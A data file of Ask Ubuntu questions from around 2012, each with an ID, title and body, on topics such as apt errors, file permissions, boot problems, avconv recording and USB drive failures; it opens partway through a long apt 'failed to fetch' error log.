//gb.archive.ubuntu.com/ubuntu/dists/precise/release.gpg bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/release.gpg got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/release.gpg bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/main/source/sources got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/universe/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/restricted/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/main/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/multiverse/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/universe/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/restricted/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/main/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/multiverse/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/universe/binary-i386/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/main/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-amd64/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-amd64/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-en got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/main/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/main/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/multiverse/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/multiverse/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/restricted/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/restricted/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/universe/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-proposed/universe/i18n/translation-en got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-en_gb got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-en got a single header line over 360 chars w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-en bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en_gb bad header line w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en bad header line
162784	what happens if a file/folder owner gets deleted ?	what happens when i delete a group wich is owner of certain folders and files ? who become the owner then ?
162785	record and display kinect audio and video via avconv	i 'm trying to record audio and video from a kinect using avconv but i seem to have trouble specifying the right options . avconv -f video4linux2 -video_size 640x480 -c : v h264 -c : a ac3 -i /dev/video1 test.mp4 results in : avconv : /build/buildd/libav-extra-0.8.3ubuntu0.12.04.1/libav/libavutil/mathematics.c:79 : av_rescale_rnd : assertion `c > 0 ' failed . aborted ( core dumped ) cheese is perfectly happy recording the audio and video from the kinect , so it 's not a setup issue . for added fun , i also need to display the video at the same time .
162788	when will the applications submitted to the ubuntu app showdown be available for download via the software centre ?	the deadline for submitting applications has passed and now the applications are being reviewed . omg ! ubuntu points out that the applications will be available on the software centre by the end of this week , however it does n't seem like the judges will review all the applications and pick the winners any time soon . so , will the applications be available for download before the winners are announced ? is it true that they 'll be available later this week ? or do we have to wait for the winners to be announced ? if so , is there a specific date ?
162795	why do i need to run sudo apt-get update	if i wanted to install some software like below . why do i need to run the sudo apt-get update before installing the program ? so for example . sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.7
162807	are there plans for an ubuntu one mobile client for symbian belle ?	will the ubuntu one mobile client be released for symbian belle ?
162808	what exactly is a chroot ? is it similar to a simultaneous dual boot ?	it has been suggested to me that the use of a chroot might solve my problem of building an application that must run on an embedded device . i have inferred from this description that it is somehow similar to creating the embedded environment locally on my machine which i can then use to develop on from my desktop development machine . is this the right way to look at the functionality or have i totally misunderstood ? in order to get some idea of how it works i read this https : //wiki.ubuntu.com/debootstrapchroot which i will attempt to make a chroot for an old ubuntu version on my machine . however , as i am a total linux novice , i am a bit concerned that as i do not entirely know what i am doing is there anyway that i could end up with an unusable system ? ? is this something that a novice should even attempt ? ? ?
162813	can i get nautilus to show me folder details on mouse hover ?	in windows explorer , one can view folder contents ' details such as size and number of files on mouse hover . is that also possible in nautilus ? in other words , how can i trigger nautilus , if possible , to display a tool tip or notification box of some sort on mouse over a folder or directory ?
162816	which laptop make has the greatest ubuntu support at the moment ?	i am running lubuntu on netbook and it has a few bugs with brightness and touchpad but i do n't mind too much because it was cheap . i need something a bit higher spec now so i have been looking into dell laptops for more support but i am not sure if there are others ? or even how good dell are with this ?
162817	ipv6 modules whats really needed ?	i 've added blacklist ipv6 to my blacklist.conf file to keep the ipv6 module from loading , but there 's a lot of other modules related to ipv6 as well that i 'd like to know if i can add to the list as well . for example : ip6t_log ip6t_rt ip6table_filter ip6_tables is it safe to unload these modules as well or are they needed for proper and safe functionality of iptables and ipv4 ?
162823	check hdd for errors and repair	my boot in windows is damaged , i 've tried several things and every time ( even when i 'm trying to format with a clean installation of windows 7 , repair disc win7 does n't work either ) i try it gets to a black screen only with the mouse arrow . i installed ubuntu 12.04 via usb stick and everything is working fine , apart some bad sectors 22 that ubuntu states - probably the errors are from there . i would like to know if there is any program like chkdsk.exe in windows to search and repair the hdd ( i 've already tried disc utility but never gets to the end-i wanted more than 10 hours not even the small check and from command prompt aswell )
162825	add-apt-repository : problem with the ssl ca cert	user @ amd64 : ~ $ sudo add-apt-repository ppa : jd-team/jdownloader [ sudo ] password for 1 : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 77 , 'problem with the ssl ca cert ( path ? access rights ? ) ' ) how to fix that ? https : //bugs.launchpad.net/ubuntu/+source/pycurl/+bug/926548 - is this bug related ? my system : ubuntu 12.04 amd64 python 2.7.3-0ubuntu2 python-software-properties 0.82.7 python-pycurl 7.19.0-4ubuntu3 libgnutls26 2.12.14-5ubuntu3 i also tried to install python-software-properties 0.82.7.1 and libgnutls26 2.12.14-5ubuntu3.1 from precise-updates , but it did not help = (
162831	ubuntu 12.04 radeon hd 6670 help !	translated from google : i have a radeon hd6670 and have not found how to make it work properly . just install the os and the screen is flashing purple . so i am only able to enter in safe graphics mode . once there i tried everything : activated drivers that ubuntu automatically detects from additional drivers , as a result it enters the desktop but it is all frozen , i can move the mouse but i can not interact with any icon . i installed the drivers manually with guidance http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide and the result was the same as in the previous case . prove to the oneiric 11.01 guide installation guide on the same page and again on desktop frizz finally installed the version 11.04 of the result http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide the desktop looks and works but i have no 3d acceleration , i can not use unity3d and all programs like pol give me error saying i have installed the wrong graphics it is the first time i installed ubuntu and i really like the os , i do not want to reinstall windows if i can lend a hand i will thank you .
162834	correct syntax for using chown on cmd line ?	i am trying to change ownership on a file but am having trouble , before it used to work , now i think i am using the wrong syntax , chown -r person : user ** or is it users ? i tried both and none work , what am i doing wrong ? also i am logged as root .
162835	how do i prevent race conditions in upstart 'starting on ' scripts ?	i am working on a package that needs two upstart jobs : one that launches a daemon , and another that launches a supporting daemon if the configuration file requires it . the logic to determine if the supporting daemon should be launched involves processing the configuration file with sed and friends , which causes problems with upstart 's daemonization detection ( upstart has no way to distinguish pids ) , so expect fork and expect daemon are n't useful . unfortunately , this means upstart detects the first invocation of sed as the first pid , and immediately starts the main job , before the supporting daemon is fully initialized . this frequently leads to the premature termination of the main job , due to an improperly configured environment . is there any way to prevent upstart from starting the main job too soon in this scenario ? expect stop looks like it 's close to what i need , but i do n't see a way to raise that signal without terminating one of the daemons , neither of which generate the sigstop signal on their own .
162836	why does checking locally cause cloud files to overwrite newer files on my pc	i used ubuntu one to upload my documents folder and some other folders to one.ubuntu.com . all documents got uploaded . but does ubuntu one re-upload documents when they change on the pc , or do i have to click the locally box ? i tried clicking it yesterday , and it overwrote my more recent pc files with older version in the cloud . fortunately , i had backed them up .
162838	start-up application	i often get an error window after i booted my computer to the desktop . this is starting to annoy me . is there a way to prevent , or disable or close it during boot up ? your help and time here is greatly appreciated . : ) ( i 'm a beginner with not an experience in programming . or any relevance . )
162846	wo n't boot after 12.04 upgrade	i am new to ubuntu and i recently upgraded to 12.04 . now when i try to start ubuntu nothing happens . i get a blank screen , not even a cursor . i am running a dual-boot with windows 7 which is still working fine . any ideas ?
162850	how to disable the keyring for ssh and gpg ?	how to disable the keyring for ssh and gpg ? i would like to keep the keyring for the wifi and other stuff . i 'm using ubuntu 12.04 .
162851	how can i map the docky anchor button so that it will launch the unity dash ?	example of a docky dock i have the docky dock on my desktop . it has an anchor logo button ( as seen on the left side image of the link above ) that brings up the docky settings . i want to map it so that it opens my dash instead . i believe i can do this through gconf and by setting the docky button to either my super key or the necessary path required to open the dash function ( but i do not know this path or how to code a button to a keyboard key ) . how can i map the docky anchor button so that it will launch the unity dash ( as similar to when you simply tap the super key ) ?
162853	how to boot into live usb/cd with uefi on latest vaio s series ?	i am unable to boot from usb/cd into a live ubuntu session to proceed with install . esc or f12 did n't work and i ca n't seem to be able to enter the bios settings . sony vaio s w/ ivy bridge ( just one month old , insyde h2o efi ? ) i have read about : creating /efi/boot on a fat16 stick http : //ubuntuforums.org/showpost.php ? p=12071096 & postcount=2 installing refind using the alternate install cd ( supposedly in order not to mess with w7 uefi boot partition ) it 's pretty clear what i have to do afterwards http : //askubuntu.com/a/157062 but i am at loss on how to simply boot into a live session then install . thank you
162854	launcher icons invisible , still work in 12.04	rebooted my pc today to find that my launcher icons are not showing on the launcher bar , even though they are still there . i can hover over the launcher bar and see ( via the mouse tool-tip ) that they are still there , and i can even interact with them . i can not , however , see them even after doing the following : trying to reset unity via unity -- reset attempting to remove and re-install compiz unity via these instructions : how can i remove and re-install unity ? .
162857	automake `` permissions denied ''	i want to compile changes i made to a project created with automake . i changed my makefile.am files accordingly and ran ./autogen.sh ./configure make make finally gives me the error : ... make [ 2 ] : betrete verzeichnis '/home/dino/workspace/ba/sharp-1.0/src' /bin/bash ../libtool -- tag=cxx -- mode=compile g++ -dhave_config_h -i . -i.. - i../include -i../include/sharp -ansi -- pedantic-error -wall -g -o2 -mt global.lo -md - mp -mf .deps/global.tpo -c -o global.lo `test -f './global.cpp ' || echo './'`./global.cpp ../libtool : line 2090 : ./global.cpp : permission denied libtool : compile : g++ -dhave_config_h -i . -i.. -i../include -i../include/sharp -ansi -- pedantic-error -wall -g -o2 -mt global.lo -md -mp -mf .deps/global.tpo -c `` '' -fpic - dpic -o .libs/global.o g++ : error : : no such file or directory g++ : fatal error : no input files compilation terminated . the command above does n't work on any source file . so i imagined it could only be my automake that broke the project .
162862	windows running ubuntu vm , super key bug !	i am running windows 7 with virtualbox installed and running ubuntu 12.04 lts . i have some functionality with the super key , but i can not do super+w to spread all windows like i used to . how can i enable this ? i do not see the option in the ubuntu keyboard shortcuts .
162866	correct permissions for /var/www and wordpress	hello and thank you in advance ! i am relatively new to ubuntu , so please excuse the newbie-ness of this question ... i have set up a lamp server ( ubuntu server 11.10 ) and i have access via ssh and to the `` it works '' page from a web browser from inside my network ( via ip address ) and from outside using dyndns . i have a couple of projects in development with some outside developers and i want to use this server as a development server for testing and for client approvals . we have some wordpress projects that sit in subdirectories in /var/www/wordpress1 /var/www/wordpress2 , etc . i can not access these sub directories from a browser in order to set up wp -- or ( i assume ) to see the content on a browser . i get a 403 forbidden error on my browser . i assume that this is a permissions problem . can you please tell me the proper settings for the permissions to : 1 ) allow the developers and me to read/write . 2 ) to allow wp set up and do its thing 3 ) allow visitors to access the site ( s ) via the web . i should also mention that the subfolder are actually simlinks to folder on another internal hdd -- i do n't think this will make a difference , but i thought i should disclose . since i am a newbie to ubuntu , step-by-step directions are greatly appreciated ! thank you for taking the time ! dp total 12 drwxr-xr-x 2 root root 4096 2012-07-12 10:55 . drwxr-xr-x 13 root root 4096 2012-07-11 20:02 .. lrwxrwxrwx 1 root root 43 2012-07-11 20:45 admin_media - > /root/django_src/django/contrib/admin/media -rw-r -- r -- 1 root root 177 2012-07-11 17:50 index.html lrwxrwxrwx 1 root root 14 2012-07-11 20:42 media - > /hdd/web/media lrwxrwxrwx 1 root root 18 2012-07-12 10:55 wordpress - > /hdd/web/wordpress here is the result of using chown -r www-data : www-data /var/www total 12 drwxr-xr-x 2 www-data www-data 4096 2012-07-12 10:55 . drwxr-xr-x 13 root root 4096 2012-07-11 20:02 .. lrwxrwxrwx 1 www-data www-data 43 2012-07-11 20:45 admin_media - > /root/django_src/django/contrib/admin/media -rw-r -- r -- 1 www-data www-data 177 2012-07-11 17:50 index.html lrwxrwxrwx 1 www-data www-data 14 2012-07-11 20:42 media - > /hdd/web/media lrwxrwxrwx 1 www-data www-data 18 2012-07-12 10:55 wordpress - > /hdd/web/wordpress i am still unable to access via browser ...
162868	usb external drive is not recognized by any os , how to troubleshoot in ubuntu ?	first of all i would like to inform you that i saw a question similar to mine but the error was different , so here 's my problem ... i have an external hd samsung s2 model of 500gb and a day to day just stopped working , tried in other systems ( windows and mac ) however are not recognized . in the windows device manager when i insert the usb it states that the device in question are not working properly . well , in the logs of my ubuntu 4.12 i see the following message when i insert my usb device in : [ 2967.560216 ] usb 7-2 : new full-speed usb device number 2 using uhci_hcd [ 2967.680182 ] usb 7-2 : device descriptor read/64 , error -71 [ 2967.904176 ] usb 7-2 : device descriptor read/64 , error -71 [ 2968.120227 ] usb 7-2 : new full-speed usb device number 3 using uhci_hcd [ 2968.240207 ] usb 7-2 : device descriptor read/64 , error -71 [ 2968.464063 ] usb 7-2 : device descriptor read/64 , error -71 [ 2968.680087 ] usb 7-2 : new full-speed usb device number 4 using uhci_hcd [ 2969.092085 ] usb 7-2 : device not accepting address 4 , error -71 [ 2969.208155 ] usb 7-2 : new full-speed usb device number 5 using uhci_hcd [ 2969.624076 ] usb 7-2 : device not accepting address 5 , error -71 [ 2969.624118 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 4520.240340 ] usb 7-1 : new full-speed usb device number 6 using uhci_hcd [ 4520.364079 ] usb 7-1 : device descriptor read/64 , error -71 [ 4520.588109 ] usb 7-1 : device descriptor read/64 , error -71 [ 4520.804140 ] usb 7-1 : new full-speed usb device number 7 using uhci_hcd [ 4520.924136 ] usb 7-1 : device descriptor read/64 , error -71 [ 4521.148083 ] usb 7-1 : device descriptor read/64 , error -71 [ 4521.364105 ] usb 7-1 : new full-speed usb device number 8 using uhci_hcd [ 4521.776237 ] usb 7-1 : device not accepting address 8 , error -71 [ 4521.888206 ] usb 7-1 : new full-speed usb device number 9 using uhci_hcd [ 4522.296102 ] usb 7-1 : device not accepting address 9 , error -71 [ 4522.296150 ] hub 7-0:1.0 : unable to enumerate usb device on port 1 [ 4749.036104 ] usb 7-2 : new full-speed usb device number 10 using uhci_hcd [ 4749.156209 ] usb 7-2 : device descriptor read/64 , error -71 [ 4749.380215 ] usb 7-2 : device descriptor read/64 , error -71 [ 4749.596206 ] usb 7-2 : new full-speed usb device number 11 using uhci_hcd [ 4749.716409 ] usb 7-2 : device descriptor read/64 , error -71 [ 4749.940110 ] usb 7-2 : device descriptor read/64 , error -71 [ 4750.156257 ] usb 7-2 : new full-speed usb device number 12 using uhci_hcd [ 4750.572150 ] usb 7-2 : device not accepting address 12 , error -71 [ 4750.684215 ] usb 7-2 : new full-speed usb device number 13 using uhci_hcd [ 4751.100182 ] usb 7-2 : device not accepting address 13 , error -71 [ 4751.100224 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 here is my system : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 002 : id 08ff:2810 authentec , inc. aes2810 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 02 ) 02:01.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev ba ) 02:01.1 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 04 ) 02:01.2 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 21 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5756me gigabit ethernet pci express 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) does anyone have any clue what would be the problem ?
162876	only local computer shows up in software centre sync	both of my computers sync files successfully through ubuntu one ; but when i open the software centre and click file > sync between computers , only the local machine shows up in the left hand panel . am i missing a setting somewhere ? both computers show the same behaviour .
162877	is it possible to permanently lock launcher icons ?	i have installed ubuntu onto my parents laptop . they are around their 80s . they manage to remove icons from the launcher accidentally again and again . i have to put them back manually , only to find them removed again two weeks later . of course they 'll swear `` they did nothing like that '' . they also reorder the icons accidentally , so remote support becomes harder , although that is n't nearly as bad . is it possible to lock icons to the launcher so the user ca n't remove them ? just removing the option on the quicklist to unlock the icon would be fine . locking its position would be great too .
162878	how to boot windows xp ( no grub menu is shown ) ?	i installed ubuntu 12.04 alongwith with windows xp . but the system directly boots ubuntu without giving grub selection menu . i opened a terminal up ( ctrl-alt-t ) and typed in the following : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update then my password and followed by : sudo apt-get install -y boot-repair & & boot-repair but i got the message as follows : buildireading package lists ... doneng dependency tree reading state information ... done e : unable to locate package boot e : unable to locate package repair so now what should i do ? please help as i can not access windows xp ...
162879	how to fix `` could not open lock file '' because `` permission denied '' ?	whenever trying to install any software and update manger , i get an error stating package operation failed the installation or removal of a software package failed when i run sudo apt-get update i got this result : conan51xd @ conan51xd-lenovo-b470 : ~ $ sudo apt-get -f install [ sudo ] password for conan51xd : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . conan51xd @ conan51xd-lenovo-b470 : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
162882	can not change the startup splash screen	i am using ubuntu studio 11.04 . i 've done sudo apt-get install lubuntu-desktop xubuntu-desktop mythbuntu-desktop kubuntu-desktop etc . and my computer turn on screen changed to kubuntu and my log in screen turned to lubuntu . how can i change both back to ubuntu studio ?
